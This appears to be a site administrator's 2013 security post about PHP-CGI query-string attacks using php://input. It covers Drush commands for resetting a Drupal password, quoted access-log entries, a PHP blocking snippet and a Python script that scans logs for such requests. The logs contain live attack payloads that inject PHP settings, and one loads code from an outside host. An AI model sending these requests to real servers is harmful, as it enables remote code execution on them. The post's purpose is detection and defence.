SSH into the website document root and install drush:
    composer require drush/drush
Use drush to reset admin user password:
    ./vendor/bin/drush user-password admin --password=[newpass]
We’ve seen several sites compromised in the last few weeks using a “local file inclusion” vulnerability with “php://input”. Here are some sample log entries:
91.224.160.25 - - [23/May/2013:12:23:54 +0000] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 247 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.860.0 Safari/535.2"
89.111.24.97 - - [29/May/2013:08:38:22 +0000] "GET /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://gofastdownload.com/rf/code.txt HTTP/1.1" 200 1104 "-" "Opera/9.80 (Windows NT 6.1; U; MRA 8.0 (build 5745); ru) Presto/2.10.229 Version/11.64"
This page explains the attack:
http://zerofreak.blogspot.com/2012/04/lfi-exploitation-via-phpinput-shelling.html
One of the compromised sites ran ExpressionEngine and one ran Drupal.
Here’s a bit of PHP code that I added to index.php to stop further attacks:
    // Reject any request whose raw query string mentions php://input (case-insensitive).
    if (stripos($_SERVER['QUERY_STRING'],'php://input') !== FALSE) {
        die("Not allowed.");
    }
Obviously this is a very serious threat. We would advise all sites to test for this vulnerability.
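To check existing access logs for requests like the sample entries above, this Python script (an added example, not code from the original post) URL-decodes each query string and flags switch-style queries that set allow_url_include or auto_prepend_file, or that mention php://input. The sample lines are constructed, using documentation addresses and an example.test host, and the function names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Common/combined log format: client, timestamp, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# PHP settings that the requests in the sample log entries try to override.
INI_RE = re.compile(r'(allow_url_include|auto_prepend_file)=(\S+)')


def classify(line):
    """Return a dict describing a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m or "?" not in m["target"]:
        return None
    # Decode %xx and '+' first: the settings arrive as "%3d", not "=".
    query = unquote_plus(m["target"].split("?", 1)[1]).lower()
    reasons = []
    if query.startswith("-"):
        reasons.append("query string starts with a command-line switch")
    for name, value in INI_RE.findall(query):
        reasons.append(f"sets {name}={value}")
    if "php://input" in query:
        reasons.append("references php://input")
    if not reasons:
        return None
    return {"ip": m["ip"], "time": m["ts"],
            "status": int(m["status"]), "reasons": reasons}


def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]


# Constructed sample lines modelled on the entries above (documentation
# addresses and an example.test host, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [23/May/2013:12:23:54 +0000] "POST /?-d+allow_url_include'
    '%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 247 "-" "UA"',
    '192.0.2.11 - - [29/May/2013:08:38:22 +0000] "GET /?-n+-dallow_url_include'
    '%3DOn+-dauto_prepend_file%3Dhttp://example.test/code.txt HTTP/1.1" 200 1104 "-" "UA"',
    '192.0.2.12 - - [29/May/2013:08:40:01 +0000] "GET /?q=node/1 HTTP/1.1" 200 5120 "-" "UA"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f["ip"], f["time"], f["status"], f["reasons"])
```

A match shows that such a request was made and logged, not that it took effect on the server.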